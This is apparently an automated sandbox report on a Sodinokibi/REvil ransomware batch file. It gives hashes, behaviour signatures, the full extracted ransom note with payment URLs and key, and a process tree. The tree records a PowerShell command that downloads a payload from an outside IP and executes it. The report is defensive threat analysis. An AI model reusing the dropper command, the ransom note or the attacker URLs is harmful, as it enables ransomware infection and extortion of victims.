Overview

overview

10

Static

static

9e35cd287a...b3.bat

windows7_x64

10

9e35cd287a...b3.bat

windows10_x64

10

Analysis

  • max time kernel
    77s
  • max time network
    45s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    29-08-2020 19:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9e35cd287a986dd3eab0fd5413dbbfb3.bat

  • Size

    215B

  • MD5

    d14242bd9a927a641dc49bf913b5b570

  • SHA1

    b031b26dd6d89c5672b9cb2f7fe66d650222a687

  • SHA256

    755c35484b2236919e799e05687ca2aff151593f39c9deee51c33f6f33c97c7a

  • SHA512

    ff13f23ffa4f9e0e568b9eb7aacfe9340d72e46dac773d51356b26b5323102c8d016f4c87ff6cb2d3d886961dd335382f37d88f27b6fac7264ae562079780ab0

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3

Extracted

Path

C:\5u9099-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5u9099. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+]WE HAVE STEALED YOUR DATA FROM SERVERS AND ARE READY TO PUBLISH THEM IN PUBLIC ACCESS (USE TOR BROWSER TO VIEW)[+] http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/151?s=868059104c94b3003e6dc66f0ca2219d [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/AF6D107408866E7D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: +2m6ax/BLMTVg9JsMDzGbKxLiU78wN9et9VGFCNiIYg+cPlZI/L9MmlOM4BPtg/g rZ7IpZ15AKV1O86CKPDY88duYwgmw8gvpsi9QRn5qBWtCWxwmVCQ+KYbLmH1m1Jq 28ozWvLM4Wlr659ywwHDZywKf0OFzkIT2FvOPGDd1HVHoYCTVQVtmKd2wroQ7bsS MaDB1Q9aRz3JIms25ZPnGVxZ+kAJDbb9pvgPhfCzsvNUpm6XbKtXDHzuZpFF9R5S MUaPNxmt6epLYTJi50VfVU98C9hQjk3FWsrOan8LDQc1VPyt2Uay7ruOF7v++8bD FPmlfazXA4TqxyWETpUojulkUwhMd0w2DdeBgMnfEjay/vT+U881QY95uOJRIRX+ xgGic9Aj3us6+8DHPuiP4fEwp5upg31/pNOjRKv3OGg+rAVJY8sofkA0baA04Nxc Vz9YSeyDhzqHIfiTjkYEQVBm9FJxV3takaFpJTjCbFZ9Rt+7+vIZihYq6DboLYOj HriGmbnmMXO55/ClUhqizJFNXIEg5dmAn+1fVPF04zC6kK/jRSTAfpycakqNM2cK meHaBto0bYTROhVUf1wlOLsrX99RLz4Qet1sOPUfsEfApJApg0uh8/xcCaJsWjDk Qybfr5Kx5WszgnKQBReH6TEblD+j7+GBcKmATOS6RwwJ1XUSbhxc348VKPfyn0mj iITYv6DnFqB1LPCcekDO++Y+30T1sA1WAXvZUMAeNg1BE2EWgWDCLC3nL1ZDohw4 nAAct4fK3/1lrQ+CNqPgm6hmxbJMPOCMPBBs5jPzR1e6pHUdSgpQN4j5sIwQYF1Y VySUMlsPanJGNgCA4rVbnHXtgZFmbZLs1Lgk3mXfoe87nT0dVio81Rv+i7gzwhfp Pw1DkWvQbMNHyVxgw6Haae8U656DuvpXXsNIb0EeoF3QluMHTKg1XHghn/nBiXr7 BJQ22NbwQ2OAk4rpntkCGzQBr0sLe8pft1tephVE2amZI6FUpE3s2dNg9z7cD09q aEITbcPVViXyDtSdVIPKp7+lcRNqqTXvI1uV6dB2kfjLYfyEy9GGfUH/Po3OxJV2 FYpKIVAKECuEvEmEdQdqaWK4JCxhMF7Zs8E726duvaJl0D2UHeGm/xCmq3d1j9hG lBOtTa1CtBvKZ7vmgJYuHUaoj+yznWVqkunAd0v7/DUeuymhGwYZz4rnXAlMuJyJ kVgOlHr9aKOGIHShfJ1a24cEsQsXsZ/gzy5/jzSymCgEPrLHaGQqy3GqxmbGHc0+ dnnweP+VV8RxImK6oy7frw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AF6D107408866E7D

http://decryptor.cc/AF6D107408866E7D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 37 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9e35cd287a986dd3eab0fd5413dbbfb3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3816
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e35cd287a986dd3eab0fd5413dbbfb3');Invoke-GBFBFRLC;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:908
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:2328
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:3068

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/908-0-0x0000000000000000-mapping.dmp

    Download

  • memory/908-1-0x0000000073960000-0x000000007404E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/908-2-0x0000000006F30000-0x0000000006F31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-3-0x0000000007690000-0x0000000007691000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-4-0x0000000007580000-0x0000000007581000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-5-0x0000000007D30000-0x0000000007D31000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-6-0x0000000007E80000-0x0000000007E81000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-7-0x0000000007FF0000-0x0000000007FF1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-8-0x0000000007E10000-0x0000000007E11000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-9-0x0000000008440000-0x0000000008441000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-10-0x00000000087A0000-0x00000000087A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-11-0x0000000009E70000-0x0000000009E71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/908-12-0x00000000093F0000-0x00000000093F1000-memory.dmp

    Filesize

    4KB

    Download